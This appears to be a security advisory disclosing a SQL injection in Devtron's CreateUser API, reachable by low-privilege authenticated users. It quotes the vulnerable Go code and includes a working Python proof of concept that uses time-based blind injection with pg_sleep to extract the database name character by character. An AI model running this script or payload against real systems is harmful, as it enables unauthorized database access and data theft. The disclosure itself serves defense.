SQL Injection in CreateUser API

Summary

An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is:

devtron/api/auth/user/UserRestHandler.go

Lines 96 to 104 in 4296366

    
           func (handler UserRestHandlerImpl) CreateUser(w http.ResponseWriter, r *http.Request) { 
        
           	decoder := json.NewDecoder(r.Body) 
        
           	userId, err := handler.userService.GetLoggedInUser(r) 
        
           	if userId == 0 || err != nil { 
        
           		common.WriteJsonResp(w, err, "Unauthorized User", http.StatusUnauthorized) 
        
           		return 
        
           	} 
        
           	var userInfo bean.UserInfo 
        
           	err = decoder.Decode(&userInfo)

The userInfo (line 104) parameter can be controlled by users.

The SQL injection can happen in the code:

devtron/pkg/auth/user/repository/UserAuthRepository.go

Line 1038 in 4296366

_, err = impl.dbConnection.Query(&model, query, entity, act)

The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.

The user should be authenticated but only needs minimum permissions:

PoC

Demonstrate a blind SQL injection to retrieve the database name:

import requests
import time
import string
import argparse

def blind(ip, token, query):
    url = f"http://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    payload = f"'; {query} --"

    data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
    start = time.time()
    res = requests.post(url, headers=headers, json = data)
    end = time.time()
    #print(res.content)
    if(end - start > 1):
        return True
    return False

def main(ip, token):
    chs = string.printable
    result = ""
    is_end = False
    i = 1
    while(not is_end):
        is_end = True
        for ch in chs:
            if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")):
                print(ch)
                result += ch
                is_end = False
                break
        i += 1
    print(result)

if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--ip", "-i", type=str, help="Target IP")
    argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
    args = argparser.parse_args()
    main(args.ip, args.token)

The debugging breakpoint indicated that the malicious SQL query was executed:

We can see that we can get the database name:

Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected.

The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL Injection in CreateUser API

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Credits

	func (handler UserRestHandlerImpl) CreateUser(w http.ResponseWriter, r *http.Request) {
	decoder := json.NewDecoder(r.Body)
	userId, err := handler.userService.GetLoggedInUser(r)
	if userId == 0 \|\| err != nil {
	common.WriteJsonResp(w, err, "Unauthorized User", http.StatusUnauthorized)
	return
	}
	var userInfo bean.UserInfo
	err = decoder.Decode(&userInfo)